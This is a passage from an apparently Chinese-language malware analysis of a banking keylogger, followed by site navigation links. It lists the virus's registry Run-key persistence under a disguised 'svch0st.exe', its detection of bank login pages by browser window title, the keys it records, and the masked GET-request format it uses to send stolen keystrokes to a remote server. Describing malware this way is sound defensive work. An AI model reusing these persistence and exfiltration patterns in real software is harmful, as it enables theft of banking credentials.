3. 在注册表的HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Current Version\Run中创建:
“svch0st.exe” = “%SystemDir%\svch0st.exe”
“taskmgr.exe” = “%SystemDir%\svch0st.exe”
4. 病毒运行后会根据IE窗口标题栏判断是否为网上银行页面,如果发现上述提到的银行后,病毒立即开始记录键盘敲击的每一个键值,记录键值包括:
AabCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz1
!2@3#4$5%6^7&8*9(0)
{BackSpace}
{Tab}
{回车}
{Shift}
{Ctrl}
{Alt}
{Pause}
{Esc}
{空格}
{End}
{Home}
{Left}
{Right}
{Up}
{Down}
{Insert}
{Delete}
;:=+,<-_.>/?`~][{\|]}'
{Del}
{F1}
{F2}
{F3}
{F4}
{F5}
{F6}
{F7}
{F8}
{F9}
{F10}
{F11}
{F12}
{NumLock}
{ScrollLock}
{PrintScreen}
{PageUp}
{PageDown}
5. 病毒截取到键盘值后,会形成信息发到指定http://*****.com/****/get.asp。其信息如下:
http://*****.com/****/get.asp?txt=××银行:<截获的按键>
6.病毒开启3个定时器,每隔几秒钟搜索用户的IE窗口,如果发现用户正在使用上述银行的“个人网上银行”的登陆界面,则尝试记录用户键入的所有键值,然后把窃取到的信息通过get方式发送到指定的服务器
相关视频
相关阅读 Windows错误代码大全 Windows错误代码查询激活windows有什么用Mac QQ和Windows QQ聊天记录怎么合并 Mac QQ和Windows QQ聊天记录Windows 10自动更新怎么关闭 如何关闭Windows 10自动更新windows 10 rs4快速预览版17017下载错误问题Win10秋季创意者更新16291更新了什么 win10 16291更新内容windows10秋季创意者更新时间 windows10秋季创意者更新内容kb3150513补丁更新了什么 Windows 10补丁kb3150513是什么
热门文章 支付宝安全控件怎么卸支付宝安全控件安装后
最新文章
支付宝被央行收编有什如何打新股流程 新股申
小米定期宝有风险吗 小米定期宝常见问题汇总熔断机制和涨跌停板的区别 熔断机制对股市的熔断机制是什么意思 A股熔断机制什么时候实佣金宝怎么赎回 佣金宝赎回教程
人气排行 蚂蚁微贷是什么意思 支付宝怎么自动扣款花呗是什么 支付宝花呗怎么用农业银行网银怎么用?农行网银使用教程工行网银助手下载失败怎么办?IE11网银不能用解决方法:IE11兼容网银设置IE11中国银行网银密码无法输入解决方法使用深发展网银出现蓝屏解决方法如何打新股流程 新股申购新规和技巧
查看所有0条评论>>